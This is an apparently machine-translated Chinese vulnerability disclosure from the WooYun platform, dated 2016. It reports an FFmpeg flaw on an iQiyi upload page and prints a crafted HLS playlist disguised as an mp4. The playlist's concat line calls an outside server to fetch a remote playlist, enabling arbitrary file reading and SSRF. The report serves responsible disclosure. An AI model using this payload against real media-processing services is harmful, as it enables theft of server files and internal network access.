漏洞标题 iQiyi主站某处的FFmpeg漏洞可能导致任意文件读取 相关制造商 奇艺 漏洞作者 数据流 提交时间 2016-05-06 14: 27 公共时间 2016-06-20 14: 50 漏洞类型 任何文件遍历/下载 危险等级 高 自我评估等级 10 漏洞状态 制造商已确认 标签标签 漏洞详细信息 案例：https://hackerone.com/reports/115857 直接上传视频没有漏洞，但您也可以将视频上传到主站的其他位置。 http://www.iqiyi.com/u/editor/ 直接上传mp4文件，如下所示: ＃EXTM3U ＃EXT-X-MEDIA-SEQUENCE: 0 #EXTINF: 10.0， Concat:http://115browser.com/mp4/remote.m3u8 ＃EXT-X-ENDLIST 其他使用文件和详细使用可以参考上面给出的hackerone案例。 漏洞证明： 上传后我将访问我的服务器，这也可能导致SSRF 阅读密码 修理计划： 版权声明：请注明数据流@乌云的来源